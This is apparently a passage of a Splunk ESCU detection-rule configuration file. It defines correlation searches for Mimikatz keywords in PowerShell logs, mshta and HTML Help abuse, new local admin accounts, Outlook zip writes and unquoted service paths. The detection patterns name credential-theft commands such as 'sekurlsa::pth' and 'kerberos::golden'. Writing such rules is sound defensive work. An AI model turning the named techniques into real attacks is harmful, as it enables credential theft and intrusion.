$process_name$ has been identified using Infotech Storage Handlers to load a specific file within a CHM on $dest$ under user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Compiled HTML Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = Detect HTML Help Using InfoTech Storage Handlers action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process IN ("*its:*", "*mk:@MSITStore:*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_using_infotech_storage_handlers_filter` [ESCU - Detect Mimikatz With PowerShell Script Block Logging - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. \ This analytic identifies common Mimikatz functions that may be identified in the script block, including `mimikatz`. This will catch the most basic use cases for Pass the Ticket, Pass the Hash and `-DumprCreds`. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1003", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. \ This analytic identifies common Mimikatz functions that may be identified in the script block, including `mimikatz`. This will catch the most basic use cases for Pass the Ticket, Pass the Hash and `-DumprCreds`. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives should be limited as the commands being identifies are quite specific to EventCode 4104 and Mimikatz. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Mimikatz With PowerShell Script Block Logging - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "Sandworm Tools", "CISA AA22-264A", "CISA AA22-320A", "CISA AA23-347A", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = The following behavior was identified and typically related to MimiKatz being loaded within the context of PowerShell on $Computer$ by $UserID$. action.risk.param._risk = [{"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Mimikatz With PowerShell Script Block Logging - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "Sandworm Tools", "CISA AA22-264A", "CISA AA22-320A", "CISA AA23-347A", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1003", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. \ This analytic identifies common Mimikatz functions that may be identified in the script block, including `mimikatz`. This will catch the most basic use cases for Pass the Ticket, Pass the Hash and `-DumprCreds`. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.notable.param.rule_title = Detect Mimikatz With PowerShell Script Block Logging action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN (*mimikatz*, *-dumpcr*, *sekurlsa::pth*, *kerberos::ptt*, *kerberos::golden*) | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mimikatz_with_powershell_script_block_logging_filter` [ESCU - Detect mshta inline hta execution - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies "mshta.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "mshta.exe" and its parent process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies "mshta.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "mshta.exe" and its parent process. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may exhibit this behavior, triggering a false positive. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect mshta inline hta execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious MSHTA Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ executing with inline HTA, indicative of defense evasion. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 90}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect mshta inline hta execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious MSHTA Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies "mshta.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "mshta.exe" and its parent process. action.notable.param.rule_title = Detect mshta inline hta execution action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_mshta` (Processes.process=*vbscript* OR Processes.process=*javascript* OR Processes.process=*about*) by Processes.user Processes.process_name Processes.original_file_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_mshta_inline_hta_execution_filter` [ESCU - Detect mshta renamed - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies renamed instances of mshta.exe executing. Mshta.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. This analytic utilizes the internal name of the PE to identify if is the legitimate mshta binary. Further analysis should be performed to review the executed content and validation it is the real mshta. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies renamed instances of mshta.exe executing. Mshta.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. This analytic utilizes the internal name of the PE to identify if is the legitimate mshta binary. Further analysis should be performed to review the executed content and validation it is the real mshta. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may use a moved copy of mshta.exe, but never renamed, triggering a false positive. action.escu.creation_date = 2022-04-07 action.escu.modification_date = 2022-04-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect mshta renamed - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious MSHTA Activity", "Living Off The Land"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect mshta renamed - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious MSHTA Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=mshta.exe AND Processes.original_file_name=MSHTA.EXE by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mshta_renamed_filter` [ESCU - Detect MSHTA Url in Command Line - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "rundll32.exe" and its parent process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "rundll32.exe" and its parent process. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It is possible legitimate applications may perform this behavior and will need to be filtered. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect MSHTA Url in Command Line - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious MSHTA Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $est$ by user $user$ attempting to access a remote destination to download an additional payload. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect MSHTA Url in Command Line - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious MSHTA Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "rundll32.exe" and its parent process. action.notable.param.rule_title = Detect MSHTA Url in Command Line action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_mshta` (Processes.process="*http://*" OR Processes.process="*https://*") by Processes.user Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_mshta_url_in_command_line_filter` [ESCU - Detect New Local Admin account - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of new accounts that have been elevated to local administrators so that you can take immediate action to mitigate the risks and prevent further unauthorized access or malicious activities. This detection is made by using the Splunk query `wineventlog_security` EventCode=4720 OR (EventCode=4732 Group_Name=Administrators) to search for relevant security events in the Windows event log. When a new account is created or an existing account is added to the Administrators group, this analytic identifies this behavior by looking for EventCode 4720 (A user account was created) or EventCode 4732 (A member was added to a security-enabled global group). This analytic specifically focuses on events where the Group_Name is set to Administrators. This detection is important because it suggests that an attacker has gained elevated privileges and can perform malicious actions with administrative access. This can lead to significant impact, such as unauthorized access to sensitive data, unauthorized modifications to systems or configurations, and potential disruption of critical services. identifying this behavior is crucial for a Security Operations Center (SOC). Next steps include reviewing the details of the security event, including the user account that was created or added to the Administrators group. Also, examine the time span between the first and last occurrence of the event to determine if the behavior is ongoing. Additionally, consider any contextual information, such as the destination where the account was created or added to understand the scope and potential impact of the attack. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the creation of new accounts that have been elevated to local administrators so that you can take immediate action to mitigate the risks and prevent further unauthorized access or malicious activities. This detection is made by using the Splunk query `wineventlog_security` EventCode=4720 OR (EventCode=4732 Group_Name=Administrators) to search for relevant security events in the Windows event log. When a new account is created or an existing account is added to the Administrators group, this analytic identifies this behavior by looking for EventCode 4720 (A user account was created) or EventCode 4732 (A member was added to a security-enabled global group). This analytic specifically focuses on events where the Group_Name is set to Administrators. This detection is important because it suggests that an attacker has gained elevated privileges and can perform malicious actions with administrative access. This can lead to significant impact, such as unauthorized access to sensitive data, unauthorized modifications to systems or configurations, and potential disruption of critical services. identifying this behavior is crucial for a Security Operations Center (SOC). Next steps include reviewing the details of the security event, including the user account that was created or added to the Administrators group. Also, examine the time span between the first and last occurrence of the event to determine if the behavior is ongoing. Additionally, consider any contextual information, such as the destination where the account was created or added to understand the scope and potential impact of the attack. action.escu.how_to_implement = You must be ingesting Windows event logs using the Splunk Windows TA and collecting event code 4720 and 4732 action.escu.known_false_positives = The activity may be legitimate. For this reason, it's best to verify the account with an administrator and ask whether there was a valid service request for the account creation. If your local administrator group name is not "Administrators", this search may generate an excessive number of false positives action.escu.creation_date = 2024-02-14 action.escu.modification_date = 2024-02-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect New Local Admin account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["DHS Report TA18-074A", "HAFNIUM Group", "CISA AA22-257A"] action.risk = 1 action.risk.param._risk_message = A $user$ on $dest$ was added recently. Identify if this was legitimate behavior or not. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect New Local Admin account - Rule action.correlationsearch.annotations = {"analytic_story": ["DHS Report TA18-074A", "HAFNIUM Group", "CISA AA22-257A"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the creation of new accounts that have been elevated to local administrators so that you can take immediate action to mitigate the risks and prevent further unauthorized access or malicious activities. This detection is made by using the Splunk query `wineventlog_security` EventCode=4720 OR (EventCode=4732 Group_Name=Administrators) to search for relevant security events in the Windows event log. When a new account is created or an existing account is added to the Administrators group, this analytic identifies this behavior by looking for EventCode 4720 (A user account was created) or EventCode 4732 (A member was added to a security-enabled global group). This analytic specifically focuses on events where the Group_Name is set to Administrators. This detection is important because it suggests that an attacker has gained elevated privileges and can perform malicious actions with administrative access. This can lead to significant impact, such as unauthorized access to sensitive data, unauthorized modifications to systems or configurations, and potential disruption of critical services. identifying this behavior is crucial for a Security Operations Center (SOC). Next steps include reviewing the details of the security event, including the user account that was created or added to the Administrators group. Also, examine the time span between the first and last occurrence of the event to determine if the behavior is ongoing. Additionally, consider any contextual information, such as the destination where the account was created or added to understand the scope and potential impact of the attack. action.notable.param.rule_title = Detect New Local Admin account action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4720 OR (EventCode=4732 Group_Name=Administrators) | transaction src_user connected=false maxspan=180m | rename src_user as user | stats count min(_time) as firstTime max(_time) as lastTime by user dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_new_local_admin_account_filter` [ESCU - Detect Outlook exe writing a zip file - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for execution of process `outlook.exe` where the process is writing a `.zip` file to the disk. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for execution of process `outlook.exe` where the process is writing a `.zip` file to the disk. action.escu.how_to_implement = You must be ingesting data that records filesystem and process activity from your hosts to populate the Endpoint data model. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon. action.escu.known_false_positives = It is not uncommon for outlook to write legitimate zip files to the disk. action.escu.creation_date = 2023-2-07 action.escu.modification_date = 2023-2-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Outlook exe writing a zip file - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments", "Amadey", "Remcos"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Outlook exe writing a zip file - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Amadey", "Remcos"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for execution of process `outlook.exe` where the process is writing a `.zip` file to the disk. action.notable.param.rule_title = Detect Outlook exe writing a zip file action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.process_name=outlook.exe by _time span=5m Processes.parent_process_id Processes.process_id Processes.dest Processes.process_name Processes.parent_process_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename process_id as malicious_id| rename parent_process_id as outlook_id| join malicious_id type=inner[| tstats `security_content_summariesonly` count values(Filesystem.file_path) as file_path values(Filesystem.file_name) as file_name FROM datamodel=Endpoint.Filesystem where (Filesystem.file_path=*.zip* OR Filesystem.file_name=*.lnk ) AND (Filesystem.file_path=C:\\Users* OR Filesystem.file_path=*Local\\Temp*) by _time span=5m Filesystem.process_id Filesystem.file_hash Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename process_id as malicious_id| fields malicious_id outlook_id dest file_path file_name file_hash count file_id] | table firstTime lastTime user malicious_id outlook_id process_name parent_process_name file_name file_path | where file_name != "" | `detect_outlook_exe_writing_a_zip_file_filter` [ESCU - Detect Path Interception By Creation Of program exe - Rule] action.escu = 0 action.escu.enabled = 1 description = The detection Detect Path Interception By Creation Of program exe is detecting the abuse of unquoted service paths, which is a popular technique for privilege escalation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.009", "T1574"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The detection Detect Path Interception By Creation Of program exe is detecting the abuse of unquoted service paths, which is a popular technique for privilege escalation. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Path Interception By Creation Of program exe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to perform privilege escalation by using unquoted service paths. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 49}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Path Interception By Creation Of program exe - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.009", "T1574"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The detection Detect Path Interception By Creation Of program exe is detecting the abuse of unquoted service paths, which is a popular technique for privilege escalation. action.notable.param.rule_title = Detect Path Interception By Creation Of program exe action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=services.exe by Processes.user Processes.process_name Processes.parent_process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | rex field=process "^.*?\\\\(?[^\\\\]*\.(?:exe|bat|com|ps1))" | eval process_name = lower(process_name) | eval service_process = lower(service_process) | where process_name != service_process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_path_interception_by_creation_of_program_exe_filter` [ESCU - Detect processes used for System Network Configuration Discovery - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for fast execution of processes used for system network configuration discovery on the endpoint. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1016"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for fast execution of processes used for system network configuration discovery on the endpoint. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must 